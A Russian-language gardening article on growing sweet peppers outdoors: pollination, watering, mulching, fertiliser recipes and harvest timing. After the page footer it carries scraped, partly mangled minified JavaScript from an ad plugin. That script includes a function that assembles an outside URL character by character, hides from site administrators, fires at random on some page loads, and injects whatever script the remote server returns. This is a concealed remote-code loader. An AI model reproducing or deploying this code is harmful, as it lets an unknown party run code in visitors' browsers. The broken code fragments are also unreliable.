Опасны для перца как низкие, так и высокие температуры. При +10 градусах и ниже развитие растений этой культуры останавливается, а при +30. 32 градусах не происходит опыления, а уже образовавшиеся цветки и завязи опадают.

Оптимальная температура почвы для перца — +18. 22 градуса.

Кстати, а вы знали, что за вегетационный период на одном растении перца появляется от 30 до 90 цветков, при этом лишь треть из них превращается в полноценные плоды?

Перец относится к самоопыляющимся растениям, однако сорта с мелкими плодами могут переопыляться с помощью насекомых-помощников — муравьев, клопов, пчелок и шмелей.

Пыльца у перца тяжелая, клейкая и поэтому может распространяться на расстояние не более одного метра. Для стимуляции плодообразования можно использовать искусственное опыление — в сухие теплые часы слегка встряхивать цветущие кустики путем постукивания по их стеблям.

В неудачное лето (слишком жаркое или, наоборот, холодное) завязывание плодов на перцах улучшают с помощью специальных препаратов вроде Завязи. Кстати, во время массового цветения кустики перца также полезно окучивать.

О том, как правильно формировать перец, выращиваемый в открытом грунте, хорошо рассказано в видео.

Полив перца в открытом грунте

Мульча нужна для того, чтобы сократить потребность в поливах и обеспечить растениям хорошие условия для развития

Основной объем корней у перца залегает в верхнем слое плодородного грунта, поэтому неудивительно, что растения этой культуры мгновенно реагируют как на недостаток влаги в почве, так и на ее переувлажнение.

Дефицит воды приводит к повышению содержания солей в почвенном растворе, что, в свою очередь, вызывает у кустиков перца одревеснение стеблей, измельчение плодов, а также осыпание листьев и завязей.

При этом своевременный и обильный полив дает прибавку в урожайности в 300-400%.

Перец поливают от 1 до 3 раз в неделю (в зависимости от погодных условий), рано утром либо вечером, расходуя по 1,5-2 литра ТЕПЛОЙ (+25 градусов) водички под каждый кустик (10-12 литров / квадратный метр грядки). В результате этого почва должна промокнуть на глубину не менее 15 сантиметров.

Полив осуществляют исключительно под корень так, чтобы капельки влаги не оседали на листьях и цветах. Чтобы предупредить образование почвенной корки, перед водными процедурами промежутки между растениями и междурядья нужно немного взрыхлить (только аккуратно и неглубоко, чтобы не повредить поверхностные корешки). А как только вода полностью впитается, рыхление также желательно повторить.

За 1,5-2 недели до окончательной уборки урожай полив полностью прекращают.

Если у вас нет возможности поливать перец так часто, то посадки этой культуры можно замульчировать перепревшей соломой, срезанными сорняками (естественно, без семян), скошенной и подвяленной травой, лузгой подсолнечника, опилками, опавшими листьями, компостом или торфом (слоем от 7 до 10 сантиметров с обновлением раз в месяц).

Благодаря этому простому агроприему, можно снизить частоту поливов до одного раза в 8-10 дней. Мульча также препятствует уплотнению грунта на грядке, защищает корни растений от перегрева и переохлаждения, а также не дает расти сорнякам.

Подкормка перца в открытом грунте

Перцы особенно нуждаются в дополнительном питании именно в период массового плодоношения

При выращивании перца в открытом грунте растениям нужно давать регулярные подкормки.

Почву на грядке с этой культурой поливают питательными растворами каждые две — три недели, всего 3-4 раза за весь период вегетации. Как правило, первую подкормку совмещают с первым основательным рыхлением и делают через пару недель после высадки перечной рассады. Также обязательно предоставьте растениям дополнительное питание в самом начале плодоношения, а также во время массового формирования плодов. А чтобы плоды были крупными и сладкими, в этот период в удобрении должны непременно присутствовать кальций и калий.

Минеральные и органические подкормки лучше чередовать. При использовании «минералки» в 10-литровом ведре растворяют 15-20 граммов аммиачной селитры, 40-50 граммов суперфосфата и 20 граммов хлористого калия (или столовую ложку любого комплексного минерального удобрения). Под каждое растения перца вносят по одному литру питательной смеси.

Из органики перцу больше всего нравятся растворы коровяка (1:10), куриного помета (1:20) или настой крапивы (1:10). При желании на 10 литров смеси можно также добавить одну столовую ложку нитрофоски и дать ей настояться в течение трех — четырех дней. Вместо нитрофоски можно также взять по 1-2 горсти древесной золы. Норма расхода получившегося настоя под одно растение — от 0,5 до 1 литра раствора.

Напомню, что после каждой подкормки посадки перца в открытом грунте слегка поливают чистой теплой водой, а как только она впитается, почву непременно рыхлят.

А еще перцы хорошо отзываются на подкормку углекислым газом. Для этого ведро на 2/3 его объема заполняют свежим куриным пометом, доливают воды и ставят емкость под пленочное укрытие. Через некоторое время помет начинает разлагаться и выделять углекислый газ, который очень благотворно влияет на рост и развитие перцев. При этом температура воздуха под пленкой повышается на 3-4 градуса, что очень важно для этого тропического растения, выращиваемого в Средней полосе России.

Перец можно подкармливать и по листьям, то есть внекорневым способом. Чтобы приготовить питательный раствор, на 10 литров воды добавляют 1 столовую ложку нитрофоски.

В качестве профилактической меры против болезней и вредителей растения перца можно опудривать просеянной древесной золой. Обработки лучше проводить по росе либо после некорневых подкормок (всего 2-3 раза за сезон).

Уборка урожая

Плоды у перца зреют достаточно медленно — в зависимости от погоды и сортовой принадлежности фаза технической спелости наступает только через 30-45 дней после появления завязи. После этого требуется еще от 25 до 35 дней, чтобы плоды достигли биологической зрелости.

В целом, чем чаще снимать плоды, тем большее количество питательных веществ будут получать оставшиеся на кустах завязи. В связи с этим первые перчики желательно убрать еще зелеными, что сильно повысит общую урожайность перечной грядки. В дальнейшем плоды можно собирать уже по мере их полного созревания, а после каждого сбора давать растениям дополнительную подкормку.

В конце июля — в начале августа у перцев, выращиваемых в открытом грунте в Средней полосе России, нужно убрать все цветки. Это способствует лучшему дозреванию оставшихся перчиков и увеличивает их размеры.

А чтобы не допускать ошибки при выращивании перца на открытой грядке, предлагаю посмотреть небольшое видео.

Таковы основные премудрости и хитрости выращивания перца в открытом грунте.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};